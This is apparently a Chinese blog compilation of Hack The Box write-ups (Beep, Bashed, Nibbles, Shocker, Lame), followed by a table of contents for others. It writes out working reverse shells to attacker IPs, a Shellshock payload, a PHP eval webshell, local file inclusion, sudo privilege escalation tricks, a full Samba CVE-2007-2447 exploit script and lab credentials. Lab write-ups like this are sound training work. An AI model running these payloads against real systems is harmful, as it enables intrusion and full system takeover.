不知道是什么版本，搜索一下，发现2.2.0存在rce漏洞

python脚本地址

https://www.exploit-db.com/exploits/18650

漏洞原理：

#https://seclists.org/fulldisclosure/2012/Mar/234

#RCE exp:
[HOST]/recordings/misc/callme_page.php?action=c&callmenum=[PHONENUMBER]@from-internal/n
Application: system
Data: [CMD]

尝试执行一下，发现会报错，看了下脚本代码挺简单的，就是访问了一下https，然后poc里的Data值写了反弹shll的命令，这里直接通过curl访问一下这个URL

curl -k --tlsv1 'https://10.10.10.7/recordings/misc/callme_page.php?action=c&callmenum=1000@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%2210.10.16.2%3a23333%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'


#Decode

https://10.10.10.7/recordings/misc/callme_page.php?action=c&callmenum=1000@from-internal/n
Application: system
Data: perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.10.16.2:23333");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

报错，代码返回提示连接失败，查了下发现是sip 协议的extension 不正确，意思是1000这个用户不正确，

sip协议格式简介

#https://blog.csdn.net/w0z1y/article/details/109352365

#示例

Via: SIP/2.0/TCP user1pc.domain.com;branch=z9hG4bK776sgdkse
From: sip:user1@domain.com;tag=49583
To: sip:user2@domain.com
Call-ID: asd88asd77a@1.2.3.4
Max-Forwards: 70
Contact: sip:192.168.100.1:1111
Content-Type: text/plain；（application/sdp; application/cpim;）
Content-Length: 18

kali的svwar工具是一个针对SIP协议的渗透工具，可以爆破用户名，也就是extension值

svwar -m INVITE -e100-1000 10.10.10.7

扫描结果

将extension改为233，重新请求

curl -k --tlsv1 'https://10.10.10.7/recordings/misc/callme_page.php?action=c&callmenum=233@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%2210.10.16.2%3a23333%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'


#Decode

https://10.10.10.7/recordings/misc/callme_page.php?action=c&callmenum=233@from-internal/n
Application: system
Data: perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.10.16.2:23333");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

反弹shell成功

提权

#whoami 当前用户
#id 当前用户权限
#sudo -l 查看有root权限的程序

居然有nmap，还是root权限，查看一下版本

nmap 2.02 - 5.21版本可以打开交互界面提权

sudo nmap --interactive

nmap>!sh

提权成功

其他思路

本地文件包含漏洞

https://www.exploit-db.com/exploits/37637

直接可以找到给出关键的文件

访问URL

https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

直接获取到账号密码

web后台和ssh使用一样的密码

直接登录ssh，

root/jEhdIekWmdjE

Bashed

Mon, 09 May 2022 12:48:40 +0800

nmap扫描

sudo nmap -T4 -Pn -A -sV -vv -sS --script=vuln -p- 10.10.10.68

扫描结果，只有80端口开放

访问http://10.10.10.68

发现项目地址

https://github.com/Arrexel/phpbash

关键信息，找到这两个文件的路径

phpbash.min.php
phpbash.php

F12看一下源码

图片路径存在目录遍历，不过没发现敏感信息

扫描web路径

dirb （这个不好用，特别慢）

推荐使用Dirbuster，支持多线程

发现dev路径，发现关键文件

访问，直接获得交互式shell，但是权限较低，后面要提权

http://10.10.10.68/dev/phpbash.php

先获取一个flag

反弹交互式shell

本地监听

nc -lvp 23333

#这里试了下端口号比较小好像会断（6666，7777），不知道什么原因

靶机执行

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.2",23333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

提权

下载linux提权检测脚本到本地

https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS/builder

本地监听80，靶机下载提权文件检测脚本

wget -P /tmp http://10.10.14.2/linpeas.sh

chmod 777 linpeas.sh

./linpeas.sh

发现该用户可直接登录

scriptmanager❌1001:1001:,,,:/home/scriptmanager:/bin/bash

#执行
sudo -u scriptmanager /bin/bash

#升级交互式shel
python -c 'import pty; pty.spawn("/bin/bash")'

再执行一下提权检测脚本

检测到这个py文件当前用户拥有读写权限。

/scripts/test.py

使用pspy监听一下进程的执行情况

https://github.com/DominicBreuker/pspy


wget -P /tmp/ http://10.10.14.2/pspy32

chmod 777 pspy32

./pspy32

发现test.py是root(uid=0)在执行，同时当前用户可以读写test.py

直接改写test.py内容为反弹shell，root执行test.py时就会把root权限的shell反弹回来。

本地监听另外一个端口

改写test.py

echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.2",23334));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'>/scripts/test.py

等待一分钟获得root权限shell

Nibbles

Sat, 07 May 2022 14:53:40 +0800

nmap

sudo nmap -T4 -Pn -n -r -p- -vv -sV 10.10.10.75

80端口

查看源码

Nibbleblog

https://seclists.org/search.html?q=NibbleBlog

4.0.3存在代码执行，但是不知道靶机是什么版本

https://seclists.org/fulldisclosure/2015/Sep/5

根据描述是需要先登录的。

弱口令,密码就是题目名称小写。

admin/nibbles

找到上传图片的位置，安装插件

上传shell.php

<?php @eval($_POST['shell']);?>

报错，但是文件上传成功

上传文件的位置，文件被重命名，但是后缀没变

http://10.10.10.75/nibbleblog/content/private/plugins/my_image/

执行命令成功

反弹shell

system("bash+-c+'{echo,YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4xMC4xNi4yLzIzMzMzIDA%2bJjE%3d}|{base64,-d}|{bash,-i}'");


#decode

bash -i >& /dev/tcp/10.10.16.2/23333 0>&1

也可以直接用蚁剑工具

#whoami 当前用户
#id 当前用户权限
#sudo -l 查看有root权限的程序

提权

发现 /home/nibbler下有个压缩包，解压

直接覆盖monitor.sh的内容

echo 'bash -c "bash -i >& /dev/tcp/10.10.16.2/24444 0>&1"'>monitor.sh

执行脚本

sudo ./monitor.sh

获得root权限

Shocker

Sun, 24 Apr 2022 14:09:40 +0800

nmap扫描

sudo nmap -T4 -Pn 10.10.10.56

扫描发现开放80，2222

扫描路径

ffuf -u "http://10.10.10.56/FUZZ" -w /usr/share/dirb/wordlists/common.txt -t 50

#FUZZ是关键字

-u url
-t 线程数
-w 字典路径

#github
https://github.com/ffuf/ffuf

扫描到 cgi-bin 目录

换个字典，对cgi-bin继续fuzz

什么也没扫到，后面看答案发现这个路径下有个 user.sh，我的路径字典没有。

查看user.sh

根据经验，发现这里存在 Bash Shellshock注入漏洞

漏洞英文名称 Bash Shellshock
中文命名 破壳（X-CERT）
威胁响应等级 A级
漏洞相关CVE编号 CVE-2014-6271
漏洞发现者 Stéphane Chazelas（法国）
漏洞发现事件 2014年9月中旬
漏洞公布时间 9月25日
漏洞影响对象 bash 1.14至bash 4.3的Linux/Unix系统

漏洞详情

https://wooyun.js.org/drops/Shellshock漏洞回顾与分析测试.html

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271

漏洞利用：

反弹shell

GET /cgi-bin/user.sh HTTP/1.1
Host: 10.10.10.56
User-Agent: () { :;};/bin/bash -i >& /dev/tcp/10.10.14.22/23333 0>&1

先拿一个flag

find / -name 'user.txt' 2>/dev/null

#过滤错误信
2>/dev/null

提权：

使用 sudo -l 查看得知有权限使用 sudo 运行 /usr/bin/perl

sudo -l

执行

sudo /usr/bin/perl -e 'exec "/bin/bash";'

拿到root权限，

find / -name 'root.txt' 2>/dev/null

Lame

Wed, 09 Mar 2022 11:56:40 +0800

nmap

nmap -T4 -Pn -A 10.10.10.3 -p 1-65535

扫描结果

Nmap scan report for 10.10.10.3
Host is up (0.26s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.3
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2022-04-02T04:51:23-04:00
|_clock-skew: mean: 2h07m46s, deviation: 2h49m45s, median: 7m43s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1047.56 seconds

首先是21端口 vsftpd 2.3.4版本搜索发现存在笑脸漏洞

原理是

此漏洞是开发者在软件中留下的后门漏洞，当连接带有vsftpd 2.3.4版本的服务器的21端口时，输入用户中带有":) "
(这大概就是此漏洞名字的来源）,密码任意，即可运行 vsf_sysutil_extra() ：打开服务器的6200端口，并且不需要密码
就能从6200端口以管理员身份登入目标服务器，漏洞危害很大。

但是通过复现后没办法利用

22端口

139、445端口

发现smbd 3.0.20-Debian服务，搜索了下发现存在cve

msf查找漏洞模块

配置

成功！

python升级交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

拿到flag

不使用mfs的话，也找到一个脚本执行

https://github.com/ozuma/CVE-2007-2447

samba-exploit.py

#!/usr/bin/python3

# Ref: https://github.com/amriunix/CVE-2007-2447/blob/master/usermap_script.py
# Ref: https://amriunix.com/post/cve-2007-2447-samba-usermap-script/
# Product: Samba
# Vuln: CVE-2007-2447
# Exploit-DB: https://www.exploit-db.com/exploits/16320
#
# install: pip3 install pysmb

import sys
import platform
from smb.SMBConnection import SMBConnection

def exploit(rhost, rport, lhost, lport):
 payload = 'mkfifo /tmp/f; nc ' + lhost + ' ' + lport + ' 0</tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f'
 username = "/=`nohup " + payload + "`"
 conn = SMBConnection(username,"","","")
 conn.connect(rhost, int(rport))


if __name__ == '__main__':
 print("[*] CVE-2007-2447 - Samba usermap script")
 if len(sys.argv) != 5:
 print("[-] usage: python " + sys.argv[0] + " <RHOST> <RPORT> <LHOST> <LPORT>")
 print("[-] at another terminal, $ nc -lvnp <LPORT>")
 else:
 print("[+] Connecting")
 rhost = sys.argv[1]
 rport = sys.argv[2] # Usually 139/tcp
 lhost = sys.argv[3]
 lport = sys.argv[4]
 exploit(rhost, rport, lhost, lport)

#安装smb模块
pip3 install pysmb
#执行
python samba-exploit.py <RHOST> <RPORT> <LHOST> <LPORT>

Hackbox | Kaia

Brainfuck

Jail

目录

nmap扫描

扫描web路径

代码分析：

漏洞的关键点

IDA调试

获取nobody shell

pkexec提权一步到位(非预期解)

正常提权

nobody提权到frank

伪造frank用户 访问nfs

frank提权到adm

adm提权到root

下面的扯淡的社工解密时间

恢复root公钥

Node

nmap端口识别

得到web账号密码

通过app.js发现了 mark ssh登录密码5AYRft73VtFpc84k

polkit提权一步到位：

常规提权：

提权到tom

提权到root

TartarSauce

Sense

nmap扫描

pfsense是个开源的防火墙和路由器功能的设备

继续扫描发现 system-users.txt

漏洞利用

直接是root权限

也可以通过msf找到exp

Nineveh

Blue

Hawk

Devops

Devops

Sunday

nmap

Solidstate

Solidstate

Cronos

Valentine

Poison

Beep

Bashed

nmap扫描

访问http://10.10.10.68

扫描web路径

反弹交互式shell

提权

本地监听80，靶机下载提权文件检测脚本

使用pspy监听一下进程的执行情况

改写test.py

等待一分钟获得root权限shell

Nibbles

Shocker

nmap扫描

扫描路径

漏洞利用：

提权：

Lame

伪造frank用户访问nfs

通过app.js发现了 mark ssh登录密码`5AYRft73VtFpc84k`